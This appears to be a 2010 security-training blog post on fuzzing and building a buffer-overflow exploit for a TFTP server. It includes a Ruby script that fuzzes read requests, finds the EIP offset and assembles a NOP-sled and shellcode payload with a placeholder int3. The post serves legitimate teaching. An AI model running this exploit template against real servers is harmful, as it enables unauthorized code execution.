Originally posted on: TUESDAY, MAY 4, 2010 AT 5:17PM
On May 8th the Kentucky ISSA held a training in Louisville, KY. I was asked to teach the section on fuzzing and exploit development. With only an hour to cover this VERY complex topic, I demonstrated a basic buffer overflow, starting with fuzzing and working through the basic steps of exploit development. This is an old, well-known exploit, but it demonstrates the important principles. Feel free to follow along with the videos and post any questions in the comments section.
Download Immunity DBG - Go To Immunity
Download Files - Here
Copy the simple_fuzzer.rb file to %MSFROOT%/modules/auxiliary/fuzzers/tftp/
Copy the tftp32-* files to %MSFROOT%/modules/exploits/windows/priv/ (the directory is "exploits", plural; Metasploit only loads modules from the correctly named type directory)
Note: In BackTrack %MSFROOT% is /pentest/exploits/framework3
Note: You will need to create the tftp and priv folders. Once the files are in place, the fuzzer appears in msfconsole as auxiliary/fuzzers/tftp/simple_fuzzer and the exploits under exploit/windows/priv/.
Part One - Fuzzing with Metasploit
Part Two - Finding EIP
Part Three - Build the Exploit
Part Four - Find EIP Offset
Part Five - Add and Test EIP Overwrite
Part Six - Add Shellcode
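As an added example (this is not the author's simple_fuzzer.rb or tftp32-* modules, which are not reproduced on this page), the following stand-alone Ruby script walks the same six steps without the Metasploit framework: it builds TFTP read requests with growing filenames (Part One), generates a pattern_create-style cyclic pattern and recovers the EIP offset from the crash value seen in the debugger (Part Four), and assembles the final filename with return address, NOP sled and shellcode (Parts Five and Six). It assumes the vulnerable field is the RRQ filename copied into a fixed-size stack buffer; the crash value, the return address, the fuzzing step sizes and the target address are hypothetical, and the shellcode is a single int3 so a debugger break confirms that execution was redirected.

```ruby
require 'socket'

# TFTP opcodes (RFC 1350). 1 = RRQ (read request).
TFTP_RRQ = 1

# Build a TFTP read request:
#   | opcode (2 bytes, big-endian) | filename | NUL | mode | NUL |
# A server that copies the filename into a fixed-size stack buffer is the
# classic overflow target (assumed here), so the filename is what we grow.
def build_rrq(filename, mode = 'octet')
  [TFTP_RRQ].pack('n') + filename.b + "\x00".b + mode.b + "\x00".b
end

# Part One: fuzz cases, i.e. filenames of increasing length. Step sizes
# are an assumption; the page's simple_fuzzer.rb may use different ones.
def fuzz_cases(start: 100, step: 100, max: 2000)
  (start..max).step(step).map { |len| build_rrq('A' * len) }
end

# Part Four: Metasploit-style cyclic pattern ("Aa0Aa1Aa2...Ab0Ab1..."), the
# construction pattern_create.rb uses. Every 4-byte window is unique within
# the first 20280 bytes, so the 4 bytes in EIP identify a single offset.
def cyclic_pattern(length)
  out = String.new(encoding: Encoding::BINARY)
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# Given the EIP value shown by the debugger after the crash, find where
# those bytes sit in the pattern (what pattern_offset.rb does). x86 is
# little-endian, so the register value is byte-reversed before searching.
# Returns nil when EIP was not overwritten with pattern bytes.
def pattern_offset(eip_hex, pattern)
  value = eip_hex.sub(/\A0x/i, '').to_i(16)
  pattern.index([value].pack('V'))
end

# Parts Five and Six: filename = padding up to EIP + return address +
# NOP sled + shellcode. ret is the address of a "jmp esp" (or similar)
# found in the debugger; the default shellcode is one int3 (0xCC).
def build_exploit_filename(offset:, ret:, nop_sled: 16, shellcode: [0xCC].pack('C'))
  ('A' * offset).b + [ret].pack('V') + ([0x90].pack('C') * nop_sled) + shellcode.b
end

# The filename field ends at the first NUL, so a return address or shellcode
# containing 0x00 would be truncated by the parser before it reaches the
# overflow. Returns the offending bytes so a different address or encoder
# can be chosen.
def bad_chars(data, bad = ["\x00".b])
  bad.select { |c| data.b.include?(c) }
end

# Send one packet to the target (UDP, port 69). Not exercised in the test.
def send_packet(host, port, packet)
  sock = UDPSocket.new
  sock.send(packet, 0, host, port)
ensure
  sock&.close
end

if __FILE__ == $PROGRAM_NAME
  pattern = cyclic_pattern(1000)
  # 0x41326241 is a made-up crash value, not one taken from the page.
  off = pattern_offset('0x41326241', pattern)
  puts "EIP offset: #{off}"
  fn = build_exploit_filename(offset: off, ret: 0x7C874413) # hypothetical jmp esp
  puts "bad chars: #{bad_chars(fn).map { |c| c.unpack1('H*') }.inspect}"
  # send_packet('192.0.2.10', 69, build_rrq(fn))  # only against a lab target
end
```

The `bad_chars` check is the step most often skipped: a return address such as 0x00401234 looks fine in the debugger but its NUL byte ends the filename, so the debugger shows EIP untouched and the exploit appears to have stopped working at Part Five.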